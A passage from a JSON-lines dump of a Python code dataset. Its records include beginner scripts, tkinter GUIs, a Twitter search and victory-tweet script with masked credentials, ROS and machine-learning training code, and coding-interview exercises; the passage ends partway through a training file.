print(b)","sub_path":"basic/123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"133609854","text":"#!/usr/bin/env python\r\n# -*- encoding:utf-8 -*-\r\n# 参考URL:https://dev.twitter.com/rest/public/search\r\n\r\nfrom requests_oauthlib import OAuth1Session\r\nimport json\r\n\r\nCONSUMER_KEY = \"****\"\r\nCONSUMER_SECRET = \"****\"\r\nACCESS_TOKEN = '****'\r\nACCESS_TOKEN_SECRET = '****'\r\n\r\nqk = \"****\"\r\n\r\n# ファイルに書き出し\r\nf = open(qk + '.txt', 'a')\r\n\r\nurl = \"https://api.twitter.com/1.1/search/tweets.json\"\r\n\r\n# 指定パラメータ\r\nparams = {\"q\": qk,\r\n \"count\":\"100\",\r\n \"result_type\":\"recent\"}\r\n\r\n# OAuth で GET\r\ntwitter = OAuth1Session(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\r\nreq = twitter.get(url, params = params)\r\n\r\nif req.status_code == 200:\r\n # レスポンスはJSON形式なので parse する\r\n timeline = json.loads(req.text)\r\n\r\n i = 1\r\n # 各ツイートの本文を表示\r\n for tweet in timeline[\"statuses\"]:\r\n try:\r\n print(tweet['text'])\r\n print(\"------------------------\")\r\n \r\n f.write(tweet['text'] + \"\\n\")\r\n f.write(\"------------------------\\n\")\r\n i = i + 1\r\n except: \r\n print(\"Error\")\r\n print(\"------------------------\")\r\n\r\nelse:\r\n # エラーの場合\r\n print (\"Error: %d\" % req.status_code)\r\n\r\nf.close()","sub_path":"search-twitter_oauth.py","file_name":"search-twitter_oauth.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"71081289","text":"#!/usr/bin/env python\n\nPROJECT = 'virtualenvwrapper-initproject'\nVERSION = '0.0.1'\n\n# Bootstrap installation of Distribute\nfrom setuptools import setup, find_packages\n\nsetup(\n name=PROJECT,\n version=VERSION,\n author='Yannick Formaggio',\n author_email='yannick@thelumberjhack.org',\n url='',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: WTPFL v2',\n 'Programming Language :: Python',\n 'Intended Audience :: Developers',\n 'Environment :: Console',\n ],\n platforms=['Any'],\n provides=['virtualenvwrapper.init_project'],\n requires=['virtualenv', 'virtualenvwrapper (>=2.0)'],\n description=(\n 'It creates a python project architecture,'\n 'setup.py, and initialize git repository while'\n 'creating new project using mkproject'\n ),\n long_description=open('README.md').read(),\n namespace_packages=['virtualenvwrapper'],\n packages=find_packages(),\n include_package_data=True,\n entry_points={\n 'virtualenvwrapper.project.post_mkproject': [\n 'user_scripts = virtualenvwrapper.init_project:post_mkproject',\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"336953085","text":"from tkinter import *\n\ndef left_click(event):\n frame1['bg'] = 'red'\n frame2['bg'] = 'white'\n frame3['bg'] = 'white'\n\n# еще один способ менять параметры виджета через метод configure\ndef middle_click(event):\n frame1.configure(bg='white')\n frame2.configure(bg='yellow')\n frame3.configure(bg='white')\n\ndef right_click(event):\n frame1['bg'] = 'white'\n frame2['bg'] = 'white'\n frame3['bg'] = 'blue'\n\nroot = Tk()\nroot.title('События мыши')\n\nroot.configure(bg='black')# задает параметры основного экрана\n\nframe1 = Frame(root, width=250, heigh=250, bg='white')\nframe2 = Frame(root, width=250, heigh=250, bg='white')\nframe3 = Frame(root, width=250, heigh=250, bg='white')\n\nframe1.grid(row=0, column=0)\nframe2.grid(row=0, column=1, padx=1, pady=2)# padx задает фрейму бардюры по оси x\nframe3.grid(row=0, column=2)\n\n# вызывает метод для главного окна, чтобы отработало нажатие мыши в любом месте виджета\nroot.bind('', left_click)\nroot.bind('', middle_click)\nroot.bind('', right_click)\nroot.mainloop()\n","sub_path":"tkinter_lesson_06_test.pyw","file_name":"tkinter_lesson_06_test.pyw","file_ext":"pyw","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"295254358","text":"'''\n\nGood morning! Here's your coding interview problem for today.\n\nThis problem was asked by Uber.\n\nGiven an array of integers, return a new array such that each element at index i of the new array is the product of all the numbers in the original array except the one at i.\n\nFor example, if our input was [1, 2, 3, 4, 5], the expected output would be [120, 60, 40, 30, 24]. If our input was [3, 2, 1], the expected output would be [2, 3, 6].\n\nFollow-up: what if you can't use division?\n'''\n\ntest_1 = [1, 2, 3, 4, 5]\ntest_2 = [3, 2, 1]\n\n\n# Problem solved with nested for loops.\ndef multiply_list(number_list):\n output_list = []\n for i in range(0, len(number_list)):\n curr = 1\n tmp_list = number_list.copy()\n tmp_list.pop(i)\n for j in range(0, len(tmp_list)):\n curr = curr * tmp_list[j]\n output_list.append(curr)\n return output_list\n\n\n# Attempting to solve this problem using recursion and without division.\ndef multiply_list_recurse(current_index, input_list=[], output_list=[]):\n if not current_index >= len(input_list):\n output_list.insert(current_index, 1)\n for i in range(0, len(input_list)):\n if not current_index == i:\n output_list[current_index] = output_list[current_index] * input_list[i]\n current_index += 1\n multiply_list_recurse(current_index, input_list, output_list)\n return output_list\n\n\n# Same as above, but without needing an index val passed.\ndef multiply_list_recurse_v2(input_list=[], output_list=[]):\n if not len(output_list) >= len(input_list):\n output_list.insert(len(output_list), 1)\n for i in range(0, len(input_list)):\n if not (len(output_list) - 1) == i:\n output_list[(len(output_list) - 1)] = output_list[(len(output_list) - 1)] * input_list[i]\n multiply_list_recurse_v2(input_list, output_list)\n return output_list\n\n\nprint(multiply_list(test_1))\nprint(multiply_list(test_2))\n\nprint(multiply_list_recurse(0, test_1, []))\nprint(multiply_list_recurse(0, test_2, []))\nprint(multiply_list_recurse(0, [], []))\n\nprint(multiply_list_recurse_v2(test_1, []))\nprint(multiply_list_recurse_v2(test_2, []))\nprint(multiply_list_recurse_v2([], []))","sub_path":"11-26.py","file_name":"11-26.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"217015057","text":"#!/usr/bin/env python\n\nimport roslib; roslib.load_manifest('smacha')\nimport rospy\nimport smach\nimport smach_ros\n\nfrom smacha_ros.srv import GripperSrv\nfrom smacha_ros.srv import GripperSrvRequest\nfrom smacha_ros.srv import GripperSrvResponse\nfrom geometry_msgs.msg import *\n\ndef gripper_srv(req):\n if req.max_effort > 5.0:\n print('gripper_srv() returning True')\n return GripperSrvResponse(True)\n else:\n print('gripper_srv() returning False')\n return GripperSrvResponse(False)\n\ndef main():\n rospy.init_node('smach_example_actionlib_service_state')\n \n # Register a gripper service\n s = rospy.Service('gripper_srv', GripperSrv, gripper_srv)\n\n # Create a SMACH state machine\n sm0 = smach.StateMachine(outcomes=['succeeded','aborted','preempted'])\n \n # Set userdata\n sm0.userdata.max_effort = 9.0\n sm0.userdata.position = Point()\n sm0.userdata.gripper_input = 9.0\n\n # Open the container\n with sm0:\n # Add states to the container\n\n # Empty request message\n smach.StateMachine.add('TRIGGER_GRIPPER_EMPTY_REQUEST',\n smach_ros.ServiceState('gripper_srv', GripperSrv),\n transitions={'succeeded':'TRIGGER_GRIPPER_FIXED_REQUEST'})\n\n # Fixed request message\n smach.StateMachine.add('TRIGGER_GRIPPER_FIXED_REQUEST',\n smach_ros.ServiceState('gripper_srv', GripperSrv,\n request = GripperSrvRequest(4.0, Point())),\n transitions={'succeeded':'TRIGGER_GRIPPER_USER_DATA_REQUEST'})\n\n # Request from user data\n smach.StateMachine.add('TRIGGER_GRIPPER_USER_DATA_REQUEST',\n smach_ros.ServiceState('gripper_srv', GripperSrv,\n request_slots = ['max_effort',\n 'position']),\n transitions={'succeeded':'TRIGGER_GRIPPER_REQUEST_CALLBACK'})\n\n # Request callback\n @smach.cb_interface(input_keys=['gripper_input'])\n def gripper_request_cb(userdata, request):\n gripper_request = GripperSrvRequest()\n gripper_request.position.x = 2.0\n gripper_request.max_effort = userdata.gripper_input\n return gripper_request\n\n smach.StateMachine.add('TRIGGER_GRIPPER_REQUEST_CALLBACK',\n smach_ros.ServiceState('gripper_srv', GripperSrv,\n request_cb = gripper_request_cb,\n input_keys = ['gripper_input']),\n transitions={'succeeded':'succeeded'})\n\n # Execute SMACH plan\n outcome = sm0.execute()\n\n rospy.signal_shutdown('All done.')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"smacha_ros/test/executive_smach_tutorials/smach_tutorials/examples/service_test.py","file_name":"service_test.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"284268598","text":"\"\"\"\nThis file serves as a evaluation interface for the network\n\"\"\"\n# Built in\nimport os\n# Torch\n\n# Own\nimport flag_reader\nfrom class_wrapper import Network\nfrom model_maker import Tandem\nimport data_reader\n\n# Libs\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef compare_truth_pred(pred_file, truth_file):\n \"\"\"\n Read truth and pred from csv files, compute their mean-absolute-error and the mean-squared-error\n :param pred_file: full path to pred file\n :param truth_file: full path to truth file\n :return: mae and mse\n \"\"\"\n pred = np.loadtxt(pred_file, delimiter=' ')\n truth = np.loadtxt(truth_file, delimiter=' ')\n\n mae = np.mean(np.abs(pred-truth), axis=1)\n mse = np.mean(np.square(pred-truth), axis=1)\n\n return mae, mse\n\n\ndef plotMSELossDistrib(pred_file, truth_file, flags):\n mae, mse = compare_truth_pred(pred_file, truth_file)\n plt.figure(figsize=(12, 6))\n plt.hist(mse, bins=100)\n plt.xlabel('Mean Squared Error')\n plt.ylabel('cnt')\n plt.suptitle('Tandem (Avg MSE={:.4e})'.format(np.mean(mse)))\n plt.savefig(os.path.join(os.path.abspath(''), 'data',\n 'Tandem_{}.png'.format(flags.eval_model)))\n plt.show()\n print('Tandem (Avg MSE={:.4e})'.format(np.mean(mse)))\n\ndef evaluate_from_model(model_dir):\n \"\"\"\n Evaluating interface. 1. Retreive the flags 2. get data 3. initialize network 4. eval\n :param model_dir: The folder to retrieve the model\n :return: None\n \"\"\"\n # Retrieve the flag object\n print(\"Retrieving flag object for parameters\")\n flags = flag_reader.load_flags(os.path.join(\"models\", model_dir))\n flags.eval_model = model_dir # Reset the eval mode\n flags.batch_size = 1 # For backprop eval mode, batchsize is always 1\n\n # Get the data\n train_loader, test_loader = data_reader.read_data(x_range=flags.x_range,\n y_range=flags.y_range,\n geoboundary=flags.geoboundary,\n batch_size=flags.batch_size,\n normalize_input=flags.normalize_input,\n data_dir=flags.data_dir)\n print(\"Making network now\")\n\n # Make Network\n ntwk = Network(Tandem, flags, train_loader, test_loader, inference_mode=True, saved_model=flags.eval_model)\n\n # Evaluation process\n print(\"Start eval now:\")\n pred_file, truth_file = ntwk.evaluate()\n\n # Plot the MSE distribution\n plotMSELossDistrib(pred_file, truth_file, flags)\n print(\"Evaluation finished\")\n\n\n\nif __name__ == '__main__':\n # Read the flag, however only the flags.eval_model is used and others are not used\n useless_flags = flag_reader.read_flag()\n\n print(useless_flags.eval_model)\n # Call the evaluate function from model\n evaluate_from_model(useless_flags.eval_model)\n\n","sub_path":"cGAN/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"340362088","text":"from gpiozero import Button, Buzzer\nfrom twython import Twython\nfrom time import sleep\nimport glob\nimport os\nfrom auth import (\n consumer_key,\n consumer_secret,\n access_token,\n access_token_secret\n)\nimport random\noneutton = Button(2)\ntwoutton = Button(3)\nthreeutton = Button(4)\nfourutton = Button(17)\nfiveutton = Button(27)\nsixutton = Button(26)\nbuzzer = Buzzer(22)\none = 0\ntwo = 0\nthree = 0\nfour = 0\nfive = 0\nsix = 0\nprint(\"Initiating\")\nbuzzer.off()\nsleep(5)\nfor i in range(10):\n print(\"Ready?\")\n sleep(random.randint(1,5))\n buzzer.on()\n while True:\n if(oneutton.is_pressed):\n print(\"Kian wins\")\n buzzer.off()\n one += 1\n break\n if(twoutton.is_pressed):\n print(\"Player 2 wins\")\n buzzer.off()\n two += 1\n break\n if(threeutton.is_pressed):\n print(\"Player 3 wins\")\n buzzer.off()\n three += 1\n break\n if(fourutton.is_pressed):\n print(\"Player 4 wins\")\n buzzer.off()\n four += 1\n break\n if(fiveutton.is_pressed):\n print(\"Player 5 wins\")\n buzzer.off()\n five +=1\n break\n if(sixutton.is_pressed):\n print(\"Player 6 wins\")\n buzzer.off()\n six +=1\n break\nwinner = max(one, two, three, four, five, six)\nwhile True:\n if(winner == one):\n print(\"Kian wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Victory for Kian!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == two):\n print(\"Player 2 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 2 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == three):\n print(\"Player 3 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 3 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == four):\n print(\"Player 4 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 4 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == five):\n print(\"Player 5 wins game\")\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Player 5 Victory!\"\n twitter.update_status(status=message)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n if(winner == six):\n print(\"Molly wins game\")\n imageFilenames = glob.glob('/home/pi/Desktop/*')\n newestImageFilename = max(imageFilenames, key=os.path.getctime)\n twitter = Twython(consumer_key, consumer_secret, access_token, access_token_secret)\n message=\"Victory for MA!\"\n with open(newestImageFilename, 'rb') as photo:\n twitter.update_status_with_media(status=message,media=photo)\n print(\"Victory Tweeted. Check at @2Stanford2019\")\n break\n else:\n pass\n \n","sub_path":"Button Game 6.py","file_name":"Button Game 6.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"239211559","text":"# Реализуйте базовый класс Car. У данного класса должны быть следующие атрибуты:\n# speed, color, name, is_police (булево). А также методы: go, stop, turn(direction), которые должны\n# сообщать, что машина поехала, остановилась, повернула (куда). Опишите несколько дочерних классов:\n# TownCar, SportCar, WorkCar, PoliceCar. Добавьте в базовый класс метод show_speed, который должен\n# показывать текущую скорость автомобиля. Для классов TownCar и WorkCar переопределите метод show_speed.\n# При значении скорости свыше 60 (TownCar) и 40 (WorkCar) должно выводиться сообщение о превышении\n# скорости.Создайте экземпляры классов, передайте значения атрибутов. Выполните доступ к атрибутам,\n# выведите результат. Выполните вызов методов и также покажите результат.\n\nfrom random import randint\n\n\nclass Car:\n def __init__(self, speed, color, name, is_police):\n self.color = color\n self.name = name\n self.speed = speed\n self.is_police = is_police\n\n def go(self):\n if self.is_police:\n return f\"Полицейская машина {self.name}, цвет {self.color}, начала движение.\"\n else:\n return f\"Машина {self.name}, цвет {self.color}, начала движение.\"\n\n def show_speed(self):\n return f\"Машина едет со скоростью {self.speed}км/ч.\"\n\n def stop(self):\n return f\"Машина {self.name} остановилась.\"\n\n def turn_direction(self):\n i = randint(1, 3)\n if i == 1:\n return f\"Машина повернула налево.\"\n elif i == 2:\n return f\"Машина поехала прямо.\"\n else:\n return f\"Машина повернула направо.\"\n\n\nclass SportCar(Car):\n def __init__(self, speed, color, name, is_police=False):\n super().__init__(speed, color, name, is_police)\n\n\nclass PoliceCar(Car):\n def __init__(self, speed, color, name, is_police=True):\n super().__init__(speed, color, name, is_police)\n\n\nclass TownCar(Car):\n def __init__(self, speed, color, name, is_police=False):\n super().__init__(speed, color, name, is_police)\n\n def show_speed(self):\n if self.speed > 60:\n return f\"Машина едет со скоростью {self.speed}км/ч.\" + \"\\033[1m\\033[31m {}\\033[0m\".format(\n \"Внимание! Вы превысили скорость!\")\n else:\n return f\"Машина едет со скоростью {self.speed}км/ч.\"\n\n\nclass WorkCar(Car):\n def __init__(self, speed, color, name, is_police=False):\n super().__init__(speed, color, name, is_police)\n\n def show_speed(self):\n if self.speed > 40:\n return f\"Машина едет со скоростью {self.speed}км/ч.\" + \"\\033[1m\\033[31m {}\\033[0m\".format(\n \"Внимание! Вы превысили скорость!\")\n else:\n return f\"Машина едет со скоростью {self.speed}км/ч.\"\n\n\ns = SportCar(120, \"красный\", \"'Астон Мартин'\")\nprint(s.go(), s.turn_direction(), '\\n' + s.show_speed(), s.stop(), '\\n')\np = PoliceCar(100, \"белый\", \"'Шевроле Круз'\")\nprint(p.go(), p.turn_direction(), '\\n' + p.show_speed(), p.stop(), '\\n')\nt = TownCar(70, \"чёрный\", \"'Дацун Мидо'\")\nprint(t.go(), t.turn_direction(), '\\n' + t.show_speed(), t.stop(), '\\n')\nw = WorkCar(50, \"оранжевый\", \"- цементовоз\")\nprint(w.go(), w.turn_direction(), '\\n' + w.show_speed(), w.stop(), '\\n')\n","sub_path":"lesson06/task04.py","file_name":"task04.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"484449455","text":"import tkinter as tk\nfrom tkinter import *\nfrom datetime import datetime\n\nscreen = tk.Tk(screenName=\"GadgetifyWithGSBlr Shopping\")\nscreen.geometry(\"1600x640\")\nscreen.title(\"GadgetifyWithGSBlr Shopping\")\nscreen.configure(bg=\"grey\")\n\nproduct_list = {\"JBL Basshead earphones: Rs. 1200\" : 1200, \"Bluetooth computer mouse: Rs. 600\": 600, \"HP Mouse: Rs. 200\":200, \n \"Realme 5 pro: Rs. 15000\": 15000, \"Sandisk Pendrive: Rs. 850\": 850}\n\n\n#getting the item purchased\n\ndef get_key(val):\n for key, value in product_list.items():\n if val == value:\n return key\n\n#creating the function \"gen_bill\" that generates the bill and creates a textfile of the same\n\ndef gen_bill():\n timestamp= datetime.now().strftime(\" %d %B %Y, %H:%M:%S \") + \"\\n\"\n shop_name= \" Shop name: GadgetifyWithGSBlr \" + \"\\n\"\n shop_address=\" shop address: 311/5 Akshay nagar, Bangalore, Karnataka, India \" + \"\\n\"\n shop_contact= \" Shop contact no: +91 9988776655 \" + \"\\n\\n\\n\"\n \n prod_pur=prod_select.get()\n name_bill=\"Name of the customer :- \" + name_entry.get() + \"\\n\"\n contact=\"Mobile of the customer :- \" + phone_entry.get() + \"\\n\"\n item_purchased = \"Item Purchased by the customer :- \" + get_key(prod_pur).split(\":\")[0] + \"\\n\"\n item_price = \"Price of the Item purchased:- Rs. \" + str(prod_pur) + \"\\n\"\n quan=\"Quantity of the item purchased:- \" + quantity_entry.get() + \"\\n\"\n pay_mode = \"Mode of Payment:- \" + mop_select.get() + \"\\n\"\n\n\n if(name_entry.get() == \"\" or phone_entry.get() == \"\" or quantity_entry.get() == \"\"):\n l2=Label(screen, text=\"Bill couldn't be generated due to one or more fields missing\", height = 2, width= 100, bg=\"#EA2511\" , fg= \"#050506\")\n l2.grid(row = 8, column= 0, columnspan=10)\n l2.after(3000, lambda: l2.destroy())\n\n else:\n #calculation of tax\n taxable_price =prod_pur* int(quantity_entry.get())\n tax = 0.06* taxable_price\n\n tax_charged= \"Tax on the Item purchased:- Rs. \" + str(tax) + \"\\n\"\n total_price= \"Final Price of the product:- Rs. \" + str(taxable_price + tax) + \"\\n\"\n\n file=open(str(name_entry.get()).split(\" \")[0], \"w\")\n file.write(timestamp)\n file.write(shop_name)\n file.write(shop_address)\n file.write(shop_contact)\n file.write(name_bill)\n file.write(contact)\n file.write(item_purchased)\n file.write(item_price)\n file.write(quan)\n file.write(tax_charged)\n file.write(total_price)\n file.write(pay_mode)\n file.close()\n l1=Label(screen, text=\"Bill generated Successfully....!!!\", height = 2, width= 100, bg=\"#2ECA12\" , fg= \"#DEF031\")\n l1.grid(row = 8, column= 0, columnspan=10)\n l1.after(3000, lambda: l1.destroy())\n \n #clearing fields\n name_entry.delete(0,END)\n phone_entry.delete(0,END)\n quantity_entry.delete(0,END)\n r1_mop.select()\n prod_select.set(1200)\n \n \n\n#create banner\nbanner = Label(screen, text= \"GadgetifyWithGSBlr Shopping Mall\", height = 3, width= 100, bg=\"#1282B6\", fg= \"#FFFFFF\")\nbanner.grid(row=0, column = 0, columnspan=10)\nbanner.config(font=(\"Courier\", 20))\n\n#create fields labels\n\nname = Label(screen, text= \"Name of the Customer\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nphone = Label(screen, text= \"Mobile No.\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nmode_of_pay = Label(screen, text= \"Payment Method\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nitem = Label(screen, text= \"Item You want to Buy\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\nquantity = Label(screen, text= \"Quantity\", height = 2, width = 30, bg=\"#1282B6\", fg= \"#FFFFFF\")\n\n#placing labels on screen\n\nname.grid(row = 1, column= 0, pady = 10)\nphone.grid(row = 2, column= 0, pady = 10)\nmode_of_pay.grid(row = 3, column= 0, pady = 10)\nitem.grid(row = 4, column= 0, pady = 10)\nquantity.grid(row = 5, column= 0, pady = 10)\n\n#creating entry box, radio button\n\nname_entry = Entry(width= 40)\nphone_entry = Entry(width= 40)\nquantity_entry = Entry(width= 40)\n\nmop_select = tk.StringVar()\nr1_mop = Radiobutton(screen, text=\"Online Banking\", value=\"Online Banking\", width= 30, variable = mop_select)\nr2_mop = Radiobutton(screen, text=\"Cash\", value=\"Cash\", width= 30, variable = mop_select)\nr3_mop = Radiobutton(screen, text=\"Card\", value=\"Card\", width= 30, variable = mop_select)\nr1_mop.select()\n\n#placing entry box, radio button on screen\n\nname_entry.grid(row = 1, column = 1, pady=10, ipady=6)\nphone_entry.grid(row = 2, column = 1, pady=10, ipady=6)\nquantity_entry.grid(row = 5, column = 1, pady=10, ipady=6)\n\nr1_mop.grid(row = 3, column = 1, ipady=6)\nr2_mop.grid(row = 3, column = 2, ipady=6)\nr3_mop.grid(row = 3, column = 3, ipady=6)\n\n#creating radio buttons for products list\n\nprod_select= tk.IntVar(screen,1200)\ncount=1\nfor (k,v) in product_list.items():\n Radiobutton(screen, text = k, variable = prod_select, value = v, width =28).grid(row = 4, column = count, ipady= 6)\n count+=1\n\n#creating BuyNow Button and placing that to screen\n\nbuy_now = Button(screen, text=\"Buy Now\", command = gen_bill, width= 40, bg=\"#1282B6\", fg= \"#FFFFFF\")\nbuy_now.grid(row =7, column = 2, ipady=6, pady=10)\n\nscreen.mainloop()","sub_path":"Easy/1. Shopping Cart Problem/solutions/bagofcodes_AnshumaliShaw/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"357823008","text":"import sys\n\n\ndef solution(data):\n masks = [0x0, 0x80, 0xE0, 0xF0, 0xF8]\n bits = [0x0, 0x0, 0xC0, 0xE0, 0xF0]\n while data:\n for x in range(4, -1, -1):\n if data[0] & masks[x] == bits[x]:\n break\n if x == 0 or len(data) < x:\n return 0\n for y in range(1, x):\n if data[y] & 0xC0 != 0x80:\n return 0\n data = data[x:]\n return 1\n\n\nif __name__ == \"__main__\":\n n = int(sys.stdin.readline())\n s = list(map(int, sys.stdin.readline().split(\" \")))\n # line = [bin(i)[2:] for i in s]\n # print(line)\n res = solution(s)\n # print(1 if res == 1 else 0)\n print(res)\n","sub_path":"头条/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"296292366","text":"num=int(input('Insira o número que você deseja descobrir se é primo: '))\r\n\r\nprimos=[]\r\n\r\nfor x in range(1, 101):\r\n cont=0\r\n\r\n for y in range(1, x+1):\r\n if x%y==0:\r\n cont+=1\r\n if cont<=2:\r\n primos.append(x)\r\n\r\nif num in primos:\r\n print('{} é um número primo'.format(num))\r\nelse:\r\n print('{} não é um número primo'.format(num))\r\n \r\nind=int(input('Se você deseja visualizar uma lista com números primos digite \"1\": '))\r\n\r\nif ind == 1:\r\n print(primos)\r\n print('OK, até mais!!')\r\nelse:\r\n print('OK, até mais!!')","sub_path":"Python/Exercises/ex52.py","file_name":"ex52.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419827158","text":"\"\"\"Relu\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nX = tf.placeholder(tf.float32)\n\nwith tf.name_scope('Relu'):\n fx = tf.nn.relu(X)\n tf.summary.scalar(\"f(x)\", tf.squeeze(fx))\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n\n # Output graph\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"log/Relu/\", graph = sess.graph)\n \n # Run the initializer\n sess.run(init)\n \n for step in range(-10,11):\n a = tf.convert_to_tensor(step, dtype=tf.float32)\n a_r = sess.run([a])\n print(sess.run(a), sess.run(fx, feed_dict={X: a_r}))\n\n sess.run(fx, feed_dict={X: a_r})\n summary = sess.run(merged, feed_dict={X: sess.run([a])})\n writer.add_summary(summary, step)\n\n# with tf.Session() as sess:\n \n# for step in range(-10,11):\n# X = tf.convert_to_tensor(step, dtype=tf.float32)\n# # X = tf.random_uniform([1,1], minval=1.0, maxval=3.0, seed=step) //Or use random number\n# print(sess.run(X), sess.run(tf.nn.relu(X)))","sub_path":"src/TensorFlow/venv/Lab/Tutorials/Activation/Relu.py","file_name":"Relu.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"237450309","text":"# coding=utf-8\r\nimport torch\r\nfrom torch.autograd import Variable\r\nfrom bert_trigger.config import Config\r\nfrom bert_trigger import BertLstmCrf\r\nimport torch.optim as optim\r\nfrom .tri_utils import load_vocab, read_corpus_tr_id, load_model, save_model\r\nfrom torch.utils.data import TensorDataset\r\nfrom torch.utils.data import DataLoader\r\nimport tqdm\r\nimport argparse\r\n\r\n\r\ndef train(config=None):\r\n \"\"\"Train Model\"\"\"\r\n # load config\r\n if not config:\r\n config = Config()\r\n print('settings:\\n', config)\r\n # load corpus\r\n print('loading corpus.')\r\n vocab = load_vocab(config.vocab)\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n tagset_size = len(label_dic)\r\n # load train and dev dataset\r\n train_data = read_corpus_tr_id(config.tri_id_train_file, max_length=config.max_length, label_dic=label_dic, vocab=vocab)\r\n train_ids = torch.LongTensor([temp[0] for temp in train_data])\r\n train_masks = torch.LongTensor([temp[1] for temp in train_data])\r\n train_tags = torch.LongTensor([temp[2] for temp in train_data])\r\n train_dataset = TensorDataset(train_ids, train_masks, train_tags)\r\n train_loader = DataLoader(train_dataset, shuffle=True, batch_size=config.batch_size)\r\n\r\n dev_data = read_corpus_tr_id(config.tri_id_dev_file, max_length=config.max_length, label_dic=label_dic, vocab=vocab)\r\n dev_ids = torch.LongTensor([temp[0] for temp in dev_data])\r\n dev_masks = torch.LongTensor([temp[1] for temp in dev_data])\r\n dev_tags = torch.LongTensor([temp[2] for temp in dev_data])\r\n dev_dataset = TensorDataset(dev_ids, dev_masks, dev_tags)\r\n dev_loader = DataLoader(dev_dataset, shuffle=True, batch_size=config.batch_size)\r\n # init model\r\n model = BertLstmCrf(config.bert_path, tagset_size, config.bert_embedding, config.rnn_hidden, config.rnn_layer, dropout_ratio=config.dropout_ratio, dropout1=config.dropout1, use_cuda=config.use_cuda)\r\n if config.load_model:\r\n assert config.load_path is not None\r\n model = load_model(model, name=config.load_path)\r\n if config.use_cuda:\r\n model.cuda()\r\n # train model\r\n print('begin training.')\r\n model.train()\r\n optimizer = getattr(optim, config.optim)\r\n optimizer = optimizer(model.parameters(), lr=config.lr, weight_decay=config.weight_decay)\r\n eval_loss = 10000\r\n for epoch in tqdm.tqdm(range(config.base_epoch)):\r\n for i, batch in tqdm.tqdm(enumerate(train_loader)):\r\n model.zero_grad()\r\n inputs, masks, tags = batch\r\n inputs, masks, tags = Variable(inputs), Variable(masks), Variable(tags)\r\n masks = masks.bool()\r\n if config.use_cuda:\r\n inputs, masks, tags = inputs.cuda(), masks.cuda(), tags.cuda()\r\n feats = model(inputs, masks)\r\n loss = model.loss(feats, masks, tags)\r\n loss.backward()\r\n optimizer.step()\r\n # save best model\r\n dev_loss_temp = evaluate(model, dev_loader, epoch, config)\r\n if dev_loss_temp < eval_loss:\r\n print('dev loss: ', eval_loss, ' -> ', dev_loss_temp)\r\n eval_loss = dev_loss_temp\r\n save_model(model, epoch)\r\n return model\r\n\r\n\r\ndef test(config=None, model=None):\r\n \"\"\"Test Model in test file\"\"\"\r\n # load config\r\n if not config:\r\n config = Config()\r\n print('settings:\\n', config)\r\n # load corpus\r\n print('loading corpus')\r\n vocab = load_vocab(config.vocab)\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n tagset_size = len(label_dic)\r\n # load test dataset\r\n 